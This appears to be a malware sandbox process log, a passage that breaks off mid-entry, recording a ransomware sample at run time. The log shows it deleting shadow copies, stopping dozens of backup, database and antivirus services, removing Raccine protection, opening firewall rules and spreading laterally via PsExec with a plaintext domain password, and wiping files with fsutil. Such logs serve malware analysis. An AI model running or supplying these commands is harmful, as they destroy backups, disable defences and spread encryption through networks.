- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5480
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  PID:5396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  PID:6108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:5888
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4152
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5876
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:6060
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5592
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4236
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4792
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:6224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.10 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:4588
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:6280
- C:\Users\Admin\AppData\Local\Temp\g5nbopzl.exe
  "C:\Users\Admin\AppData\Local\Temp\g5nbopzl.exe" \10.10.0.10 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
  2⤵
  PID:6868
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:6072
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5264
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:6176
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
  2⤵
  PID:6924
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:5644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:6696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:7008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:6940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:6432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:4808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:4848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:4764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:7084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:7076

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:5704

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:212
- C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
  "2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
  2⤵
  PID:4904
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:6408
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:6320
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:6348
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:3120
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4928
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:6668
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:4996
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:272
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:264
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:256
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:6792
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:6060
- - C:\Windows\system32\net.exe
    "net.exe" start FDResPub /y
    3⤵
    PID:5628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:6080
- - C:\Windows\system32\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:6904
- - C:\Windows\system32\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:6932
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4396
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5916
- - C:\Windows\system32\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:3800
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:4804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:2580
- - C:\Windows\system32\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:4344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:4380
- - C:\Windows\system32\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:6756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:5376
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5364
- - C:\Windows\system32\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:6640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:7032
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:7024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:5236
- - C:\Windows\system32\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:6052
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:4600
- - C:\Windows\system32\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:6324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:1036
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:4824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:4748
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:5616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:4796
- - C:\Windows\system32\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:4436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:4972
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:7148
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:1044
- - C:\Windows\system32\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:4616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:2384
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:4272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:6948
- - C:\Windows\system32\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:1328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:4276
- - C:\Windows\system32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:4124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:5768
- - C:\Windows\system32\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:1176
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:4000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:1264
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:1020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:5900
- - C:\Windows\system32\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:3976
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:4504
- - C:\Windows\system32\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:4908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:5508
- - C:\Windows\system32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:4188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:6032
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:2680
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:4036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:2684
- - C:\Windows\system32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:4628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:4284
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:4432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:4756
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:7156
- - C:\Windows\system32\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:6960
- - C:\Windows\system32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:4176
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:6260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:6952
- - C:\Windows\system32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:4968
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:6796
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:4448
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:5756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:2308
- - C:\Windows\system32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:1624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:2208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Enterprise Client Service” /y
      4⤵
      PID:5848
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:5180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:4840
- - C:\Windows\system32\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:5568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:7096
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:2248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:6716
- - C:\Windows\system32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:6728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:6068
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:6312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:7116
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:3672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:5316
- - C:\Windows\system32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:6624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SavRoam /y
      4⤵
      PID:6308
- - C:\Windows\system32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:268
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:4252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:1680
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:6420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:6244
- - C:\Windows\system32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RTVscan /y
      4⤵
      PID:6400
- - C:\Windows\system32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:5684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:4288
- - C:\Windows\system32\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:4236
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:6088
- - C:\Windows\system32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:4560
- - C:\Windows\system32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:4196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:4800
- - C:\Windows\system32\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:6468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:5344
- - C:\Windows\system32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:5824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:6640
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:5060
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:6112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:4760
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:6756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:2004
- - C:\Windows\system32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:4376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:5528
- - C:\Windows\system32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:4368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:6160
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:4796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:5524
- - C:\Windows\system32\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:5836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:4892
- - C:\Windows\system32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:5896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:1044
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:4552
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:4304
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:4652
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:1300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:6208
- - C:\Windows\system32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:6448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:1684
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:6948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:5764
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:5080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:4440
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:5212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:6252
- - C:\Windows\system32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:1876
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:2076
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:5348
- - C:\Windows\system32\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:4820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:4316
- - C:\Windows\system32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:3820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:2704
- - C:\Windows\system32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:5520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:5476
- - C:\Windows\system32\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:3300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:7088
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:6000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:1408
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:5544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:4508
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:4244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:4460
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:6180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:6684
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:3312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:6460
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:7092
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:5576
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:4392
- - C:\Windows\system32\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:5312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:6952
- - C:\Windows\system32\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:4192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:5104
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:5248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:4608
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:5356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:4784
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:6796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:6840
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:2288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:5256
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:4268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:5676
- - C:\Windows\system32\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:2204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:6584
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:7140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:5380
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:6068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:5044
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:6740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:5644
- - C:\Windows\system32\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:6308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:6244
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:7116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:6828
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:284
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:6660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:7108
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:6156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:7152
- - C:\Windows\system32\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:6624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:4188
- - C:\Windows\system32\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:4432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:6236
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:5484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:4228
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:6908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:7036
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:5984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:5684
- - C:\Windows\system32\net.exe
